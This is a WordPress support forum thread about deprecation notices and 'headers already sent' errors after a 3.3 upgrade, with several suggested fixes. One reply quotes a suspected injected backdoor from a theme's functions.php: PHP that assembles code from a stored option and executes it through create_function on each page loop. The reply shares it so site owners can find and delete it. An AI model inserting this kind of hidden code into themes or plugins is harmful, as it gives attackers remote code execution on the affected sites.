WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] WordPress Network add contextual help error (15 posts)

  1. MatthewRuddy
    Member
    Posted 2 years ago #

    Hi everyone. Having some issues since upgrading my networked site to 3.3. All of my sites have an error at the top of the page:

    Notice: add_contextual_help is deprecated since version 3.3! Use get_current_screen()->add_help_tab() instead. in /home/matthew/public_html/wp-includes/functions.php on line 3458

    And I get this when activating a plugin from one of the sites (but not when activated via Network Admin area):

    Notice: add_contextual_help is deprecated since version 3.3! Use get_current_screen()->add_help_tab() instead. in /home/matthew/public_html/wp-includes/functions.php on line 3458
    
    Warning: Cannot modify header information - headers already sent by (output started at /home/matthew/public_html/wp-includes/functions.php:3458) in /home/matthew/public_html/wp-includes/pluggable.php on line 866
    
    Warning: Cannot modify header information - headers already sent by (output started at /home/matthew/public_html/wp-includes/functions.php:3458) in /home/matthew/public_html/wp-includes/pluggable.php on line 866

    Also getting it when using the Media Uploader. Anyone else having this problem? Never made any changes to the WordPress files.

  2. esmi
    Forum Moderator
    Posted 2 years ago #

    It's a plugin and/or theme issue.

  3. MatthewRuddy
    Member
    Posted 2 years ago #

    Running no plugins (all deleted) and using the default WordPress theme (TwentyEleven).

  4. MatthewRuddy
    Member
    Posted 2 years ago #

    Figured it out. Had to upgrade TwentyEleven theme.

  5. asaporito90046
    Member
    Posted 2 years ago #

    Here is another element to the equation - I always delete twenty twleve the minute I install wordpress and choose a better theme. So knowing that twenty twelve theme isn't present - what should I do? I'm having this same issue.

  6. esmi
    Forum Moderator
    Posted 2 years ago #

    Please post a new topic.

  7. asaporito90046
    Member
    Posted 2 years ago #

  8. JerryOdom
    Member
    Posted 2 years ago #

    traced the issue to a 302 redirect that was generated at login so just went to a non-broke site and copied the url and changed the domain to get past that redirect. To do it use this url with your settings

    http://www.mydomain.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.mydomain.com%2Fwp-admin%2F&reauth=1

    You'll be able to login here. In my case the NextGen plugin was in need of a critical update. I updated it and problem went away

    Cheers

  9. emotionx
    Member
    Posted 2 years ago #

    Upload folder wp-includes function.php file again.

  10. asaporito90046
    Member
    Posted 2 years ago #

    Actually I figured out how to fix this issue myself. It is the dummest thing that fixes it. All you have to do is open up the file with the error message associated with it and delete the extra line breaks from within the file before and after the "php" function calls to action and it works like a charm. Basically what happen was when we install our widgets and ramdom plug-ins - these function files get altered by the new strings of code which cause random line breaks and other white spaces. You would think these silly white spaces wouldn't matter but they do. The biggest white space issues are usually at the very end of the file down by the last line of code on the file. Just delete the extra line breaks on the line they specify in the error along with the extra breaks at the end of the file and upload it back to the remote site and BOOM! works like a dream. What a stupid error. :-)

  11. barrettbreshears@gmail.com
    Member
    Posted 2 years ago #

    @asaporito90046 thanks, It was a white space issue for me as well. Thanks for the help

  12. asghar786
    Member
    Posted 2 years ago #

    I think this is a kind of attack ... i resolve this problem after finding function.php under my customized theme...

    Please find this injected script and delete immediately then you will be able to get login in admin area as well as can see your website ...

    <?php ?>
    <?php function page_options() { $option = get_option('page_option'); $opt=unserialize($option);
    @$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');}
    add_action('loop_start', 'page_options'); ?>

  13. Valonc
    Member
    Posted 2 years ago #

    Actually I figured out how to fix this issue myself. It is the dummest thing that fixes it. All you have to do is open up the file with the error message associated with it and delete the extra line breaks from within the file before and after the "php" function calls to action and it works like a charm. Basically what happen was when we install our widgets and ramdom plug-ins - these function files get altered by the new strings of code which cause random line breaks and other white spaces. You would think these silly white spaces wouldn't matter but they do. The biggest white space issues are usually at the very end of the file down by the last line of code on the file. Just delete the extra line breaks on the line they specify in the error along with the extra breaks at the end of the file and upload it back to the remote site and BOOM! works like a dream. What a stupid error. :-)

    Thanx asaporito90046 , i hade the same problem and this fixed it

  14. danwild
    Member
    Posted 2 years ago #

    @asaporito90046 - Thanks, same problem here

  15. lucasmjunior
    Member
    Posted 2 years ago #

    I had the same problem and do not believe it is the "white space". I tried to delete the white space but nothing resolved.

    The solution was simple:

    Just replace the file that is the first error:
    Warning: Can not modify header information - headers already sent by (output started at / home / agenciac / public_html / functions.php: 2) in / home / agenciac / public_html / wp-includes / pluggable.php on line 881

    In most cases the error is in the file of the theme. Then have always booked up the theme. Where there is error only replace the "first larval file error".

    Hugs!

Topic Closed

This topic has been closed to new replies.

About this Topic